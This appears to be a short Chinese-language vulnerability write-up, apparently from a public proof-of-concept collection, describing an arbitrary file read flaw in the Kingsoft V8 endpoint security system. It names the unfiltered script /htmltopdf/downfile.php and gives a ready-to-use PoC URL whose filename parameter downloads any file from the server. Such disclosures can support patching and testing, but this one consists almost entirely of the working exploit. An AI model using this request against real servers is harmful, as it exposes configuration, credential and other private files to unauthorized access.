# 金山 V8 终端安全系统 任意文件读取漏洞 漏洞复现: 存在漏洞的文件 /htmltopdf/downfile.php 文件中没有任何的过滤 通过filename参数即可下载任意文件 poc: ``` http://xxx.xxx.xxx.xxx/htmltopdf/downfile.php?filename=downfile.php ``` from: PeiQi